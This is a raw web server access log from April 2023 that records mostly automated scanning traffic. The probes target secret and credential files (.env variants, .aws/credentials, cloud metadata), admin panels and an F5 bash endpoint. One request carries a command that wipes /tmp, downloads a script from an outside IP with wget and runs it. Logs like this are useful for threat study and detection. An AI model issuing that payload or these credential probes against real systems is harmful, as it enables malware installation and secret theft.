123.125.122.27 - admin [13/Apr/2023:22:01:35 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 405 422516 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
123.125.122.27 - - [13/Apr/2023:22:01:36 +0000] "GET / HTTP/1.1" 200 41226 "-" "curl/7.58.0"
198.235.24.134 - - [13/Apr/2023:22:14:48 +0000] "GET / HTTP/1.0" 200 41463 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
43.154.128.189 - - [13/Apr/2023:22:29:17 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.217.54 - - [13/Apr/2023:22:53:48 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [13/Apr/2023:22:53:48 +0000] "POST / HTTP/1.1" 405 409719 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.105.128.11 - - [13/Apr/2023:22:57:21 +0000] "\x16\x03\x01" 400 226 "-" "-"
64.227.180.172 - - [13/Apr/2023:23:23:07 +0000] "GET / HTTP/1.1" 200 8385 "-" "Linux Gnu (cow)"
185.254.196.173 - - [13/Apr/2023:23:37:01 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [13/Apr/2023:23:37:04 +0000] "POST / HTTP/1.1" 405 409728 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [13/Apr/2023:23:47:46 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.217.54 - - [13/Apr/2023:23:56:04 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [13/Apr/2023:23:56:05 +0000] "POST / HTTP/1.1" 405 409749 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.159.164.227 - - [14/Apr/2023:00:54:44 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
51.159.164.227 - - [14/Apr/2023:00:54:44 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
51.159.164.227 - - [14/Apr/2023:00:54:45 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
43.154.128.189 - - [14/Apr/2023:01:06:32 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [14/Apr/2023:01:10:22 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [14/Apr/2023:01:10:23 +0000] "POST / HTTP/1.1" 405 409678 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [14/Apr/2023:01:18:01 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [14/Apr/2023:01:18:02 +0000] "POST / HTTP/1.1" 405 409737 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.33.80.243 - - [14/Apr/2023:01:18:03 +0000] "\x16\x03\x01" 400 226 "-" "-"
94.102.56.151 - - [14/Apr/2023:01:28:28 +0000] "GET / HTTP/1.1" 200 41226 "-" "libwww-perl/6.61"
109.237.97.180 - - [14/Apr/2023:01:49:23 +0000] "\x16\x03\x01\x01H\x01" 400 226 "-" "-"
109.237.97.180 - - [14/Apr/2023:01:49:23 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.97.180 - - [14/Apr/2023:01:49:24 +0000] "POST /.env HTTP/1.1" 405 411989 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
198.235.24.23 - - [14/Apr/2023:02:15:01 +0000] "GET / HTTP/1.1" 200 41226 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
43.154.128.189 - - [14/Apr/2023:02:25:54 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:42:51 +0000] "GET /.env.www HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:42:51 +0000] "POST /.env.www HTTP/1.1" 405 412219 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:42:54 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:42:55 +0000] "GET /.env_1 HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:42:56 +0000] "POST /.env_1 HTTP/1.1" 405 412107 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:42:58 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:42:58 +0000] "GET /.env_sample HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:42:59 +0000] "POST /.env_sample HTTP/1.1" 405 412413 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:01 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:02 +0000] "GET /.aws/credentials HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:03 +0000] "POST /.aws/credentials HTTP/1.1" 405 412711 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:05 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:05 +0000] "GET /_static/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:06 +0000] "POST /_static/.env HTTP/1.1" 405 412503 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:08 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:08 +0000] "GET /.c9/metadata/environment/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:09 +0000] "POST /.c9/metadata/environment/.env HTTP/1.1" 405 413427 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:11 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:11 +0000] "GET /.docker/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:12 +0000] "POST /.docker/.env HTTP/1.1" 405 412491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:14 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:15 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:15 +0000] "POST /.env HTTP/1.1" 405 411977 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:17 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:18 +0000] "GET /.env.backup HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:18 +0000] "POST /.env.backup HTTP/1.1" 405 412433 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:20 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:21 +0000] "GET /.env.dev HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:21 +0000] "POST /.env.dev HTTP/1.1" 405 412205 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:24 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:25 +0000] "GET /.env.bak%20 HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:25 +0000] "POST /.env.bak%20 HTTP/1.1" 405 412413 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:28 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:28 +0000] "GET /.env.old HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:29 +0000] "POST /.env.old HTTP/1.1" 405 412213 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:31 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:32 +0000] "GET /.pnp HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:33 +0000] "POST /.pnp HTTP/1.1" 405 411993 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:35 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:35 +0000] "GET /.pnp.js HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:36 +0000] "POST /.pnp.js HTTP/1.1" 405 412161 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:38 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:39 +0000] "GET /debug.log HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:39 +0000] "POST /debug.log HTTP/1.1" 405 412281 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:42 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:43 +0000] "GET /web.config HTTP/1.1" 200 914 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:43 +0000] "POST /web.config HTTP/1.1" 200 914 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:45 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:46 +0000] "GET /config.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:46 +0000] "POST /config.json HTTP/1.1" 405 412423 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:48 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:49 +0000] "GET /meta-data HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:50 +0000] "POST /meta-data HTTP/1.1" 405 412311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:52 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [14/Apr/2023:02:43:53 +0000] "GET /latest/meta-data HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:53 +0000] "POST /latest/meta-data HTTP/1.1" 405 412683 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:02:43:56 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
172.105.128.12 - - [14/Apr/2023:02:55:02 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.217.54 - - [14/Apr/2023:03:37:21 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [14/Apr/2023:03:37:21 +0000] "POST / HTTP/1.1" 405 409727 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [14/Apr/2023:03:41:10 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [14/Apr/2023:03:45:51 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.217.54 - - [14/Apr/2023:04:37:09 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [14/Apr/2023:04:37:10 +0000] "POST / HTTP/1.1" 405 409727 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.79.181.179 - - [14/Apr/2023:04:55:20 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [14/Apr/2023:05:06:13 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [14/Apr/2023:05:14:38 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [14/Apr/2023:05:14:38 +0000] "POST / HTTP/1.1" 405 409744 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
60.221.238.51 - - [14/Apr/2023:05:45:46 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
159.65.152.150 - - [14/Apr/2023:05:54:17 +0000] "\x16\x03\x01" 400 226 "-" "-"
159.65.152.150 - - [14/Apr/2023:05:54:18 +0000] "\x16\x03\x01" 400 226 "-" "-"
159.65.152.150 - - [14/Apr/2023:05:54:18 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.65.152.150 - - [14/Apr/2023:05:54:19 +0000] "GET /client/get_targets HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.65.152.150 - - [14/Apr/2023:05:54:20 +0000] "GET /upl.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
159.65.152.150 - - [14/Apr/2023:05:54:20 +0000] "\x16\x03\x01" 400 226 "-" "-"
159.65.152.150 - - [14/Apr/2023:05:54:21 +0000] "GET /geoip/ HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.65.152.150 - - [14/Apr/2023:05:54:21 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
159.65.152.150 - - [14/Apr/2023:05:54:22 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
135.125.217.54 - - [14/Apr/2023:06:03:50 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [14/Apr/2023:06:03:50 +0000] "POST / HTTP/1.1" 405 409695 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [14/Apr/2023:06:26:39 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [14/Apr/2023:06:34:30 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [14/Apr/2023:06:34:30 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
192.241.203.13 - - [14/Apr/2023:06:46:23 +0000] "MGLNDD_13.244.159.169_80\n" 400 226 "-" "-"
135.125.244.48 - - [14/Apr/2023:07:07:34 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:07:07:35 +0000] "POST / HTTP/1.1" 405 409729 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
74.82.47.3 - - [14/Apr/2023:07:16:05 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0"
74.82.47.3 - - [14/Apr/2023:07:17:57 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
74.82.47.3 - - [14/Apr/2023:07:18:42 +0000] "GET /geoserver/web/ HTTP/1.1" 301 243 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0"
43.154.128.189 - - [14/Apr/2023:07:46:52 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
198.199.100.87 - - [14/Apr/2023:08:04:01 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 zgrab/0.x"
61.253.14.136 - - [14/Apr/2023:08:10:10 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
61.253.14.136 - admin [14/Apr/2023:08:10:17 +0000] "GET /manager/html HTTP/1.1" 200 - "-" "-"
139.162.255.110 - - [14/Apr/2023:08:12:48 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
185.202.172.185 - - [14/Apr/2023:08:54:50 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
